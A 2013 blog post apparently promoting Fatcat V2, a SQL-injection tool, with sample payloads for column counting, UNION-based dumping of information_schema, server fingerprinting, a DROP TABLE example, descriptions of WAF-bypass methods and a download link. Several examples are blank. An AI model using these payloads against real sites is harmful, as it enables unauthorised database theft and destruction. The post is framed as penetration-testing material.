Fatcat V2 Auto [S]ql-Injector

March 29, 2013, by | Start Discussion

Fatcat is open source web application pen tester tool freely available for download. Fatcat SQL injection is developed for reducing the processes of while exploiting SQL injection vulnerability and exploiting SQL injection profoundly.

Features of Fatcat V2

  • It support normal SQL injection
  • It support error based SQL injection
  • WAF (web application firewall) bypass.
    • C-Style Mysql comment WAF Bypass
    • Buffer overflow WAF Bypass
    • CRLF WAF Bypass
    • Bypass with Information_schema.statics
    • Bypass with Information_schema.key_column_usage
  • Its run on Widely used server that is Linux , Win ,Max Os
  • It support Mysql 5.0

Snap shot of FatCat SQL Injector

To execute this tool please Provide Testing URL, Parameter (vulnerable URL), Max column count, and select injection typ. If you want to bypass WAF select any one of from list.

SQL injection brief

SQL injection is one of the most common vulnerabilities in PHP applications. SQL injection vulnerability requires two failures on the part of the developer – a failure to filter the data as it enters the application and a failure to escape data as it enters the application.

If attacker having lucky day and found a varible which is in Mysql data base and varible is vulnerable to SQL injection , then will attacker craft a payload Like ;DROP TABLE clubhackParty– – 

After the successful execution of the above query it will delete the table called as clubhack and query is looks like following vaild SQL Statement.

Fatcat Ingredient

Information Gathering Operation

For gathering Mysql 5.0 database information Fatcat call the following functions to harvest DB info.

*Let’s considered column 2 is vulnerable from where fatcat extract the DB information & data.

    • To find the total number of columns present into table Fatcat using following SQL Statement, where n is total number of columns of table which is present in the column.

Order by n+1

Fatcat create a valid SQL statement to count the number of present column numbers. Which is looks like following SQL valid SQL Statement.

Example: Select+1, 2, 3+where+id=2+Order+by+1– –

Note: This Operation is located at line number 114 in the dosql.php file.

    • Fatcat is using standard Mysql function to find out current version of Mysql.

VERSION ()

Example: Select+1, Version(), 3+where+id=2– –

Note: Finding version operation is located at line number 163 in the dosql.php file.

    • To fetch Mysql current user name of Mysql Fatcat using following function.

User()

Example: Select+1, User(), 3+where+id=2– –

Note: User () is code is located at line number 174 in the dosql.php file.

    • To finding Data Directory of database, Fatcat using following SQL statement.
      @@datadir

Example: Select+1, @@datadir, 3+where+id=2– –

Note: @@datadir is code is located at line number 182 in the dosql.php file.

    • To finding Base Directory of database, Fatcat using following SQL statement.

@@basedir

Example: Select+1, @@basedir, 3+where+id=2– –

Note: @@basedir is code is located at line number 189 in the dosql.php file.

    • To finding Host Name, Fatcat using following SQL statement.

@@hostname

Example: Select+1, @@hostname, 3+where+id=2– –

Note: @@hostname is code is located at line number 203 in the dosql.php file.

    • To finding Operating System version, Fatcat using following SQL statement.

@@version_compile_os

Example: Select+1, @@version_compile_os, 3+where+id=2– –

Note: @@version_compile_os is code is located at line number 209 in the dosql.php file.

    • To find Max allowed packet size, Fatcat using following SQL statement.

@@max_allowed_packet

Example: Select+1, @@max_allowed_packet, 3+where+id=2– –

Note: @@max_allowed_packet is code is located at line number 196 in the dosql.php file.

    • To finding Current Database name, Fatcat using following SQL function.

Database()

Example: Select+1,database(), 3+where+id=2– –

Note: database() is code is located at line number 159 in the dosql.php file.
Normal SQL injection Operation (Union select Injection)

Normal SQL injection is one of the important features of the Fatcat. Normal SQL injection is combination of Union & Select SQL statement. Union statement helps us to combine two result set of the select statement. Normal SQL injection perfectly works only when any column is vulnerable like as in the above example column 2 is vulnerable.

Whenever you inject using Normal SQL injection, Fatcat automatically start selecting vulnerable column & start profoundly exploit it.

Snap Shot for Normal SQL Injection:

Enter parameters to execute Normal SQL injection & click Inject It! You will find the normal SQL Injection code from line number 93(file name dosql.php).

Example: SELECT username FROM Users_profile WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ),1,1024) FROM information_schema.columns--+';

Error Based SQL injection Operation (Double Query Injection)

Error based SQL injection is one of important features of the Fatcat , it is also called as Double Query Injection. Some time Union based injection gets failed, to exploit profoundly in that condition user can use error based SQL injection to retrieve DB information.

Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want. Now double query definitely utilizes fewer requests that blind SQL does, but there is no group_concat feature(obviously) which means we must use concat with Limit to pull them to pull the info query by query using limit 0,1, limit 1,1, etc. I know you guys are well versed in SQL so I won’t waste any more time on logistics.

For example:

Mysql Query:


Output:

duplicat    e entry ‘~‘Clubhack_screte’~1’ for key 1

Where Clubhack_screte is table name

You will find the normal SQL Injection code from line number 330 (file name dosql.php).
WAF (Web Application Firewall) Bypass

According to OWASP, web application firewall (WAF) is an appliance, server plug-in, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Fatcat V2 supports the following WAF’s.

  • AppArmor
  • ModSecurity – Also works under Mac OS X, Solaris and other versions of Unix.

Fatcat V2 supports the following WAF bypass method.

  • C-style comment WAF bypass
  • Buffer Overflow WAF bypass
  • CRLF(CR = Carriage Return and LF = Line Feed) WAF Bypass
  • WAF Bypass with Information_schema.statics
  • WAF Bypass with Information_schema.key_column_usage

Brief Description:

1. C-style MYSQL comment WAF bypass

  • This statement is called /*!MysqlQuery*/ is called as C-style Comment
  • These styles execute MySQL queries in comments.
  • When we execute that, the MySQL server parses our query and it will execute query

Example:

The bold portion is the example of the C-Style Comment WAF bypass.

2. Buffer Overflow WAF bypass

  • An exploitation technique that alters the flow of an application by overwriting parts of memory. Buffer Overflows are a common cause of malfunctioning software. If the data written into a buffer exceeds its size, adjacent memory space will be corrupted and normally produce a fault.
  • An attacker may be able to utilize a buffer overflow situation to alter an application’s process flow.

Example:

3. CRLF(CR = Carriage Return and LF = Line Feed) WAF Bypass

  • CRLF (Carriage Return and Line Feed) is a very significant sequence of characters for programmers.
  • Use of CRLF in Mysql to Carriage Return or Line Feed.
  • Normal WAF doesn’t detect the CRLF use in SQL injection.

Example:

4. Some WAF Blocked the certain keywords like information_schema.tables , for alternative to this keyword we have following other keywords

  • Information_schema.statics

This MYSQL statement display the total list of Index of the tables

Example:

The bold part show the use of the information_schema.statics in fatcat

  • Information_schema.key_column_usage

The KEY_COLUMN_USAGE table describes which key columns have constraints.

Example:

The bold part show the use of the Information_schema.key_column_usage in fatcat. Using following link you can download the latest version of Fatcat.

https://dl.dropbox.com/u/18007092/FatCat%20V2%20-%20SandeepKamble.com.zip

Thank you for reading

 

Author bio not avialable

Leave a Reply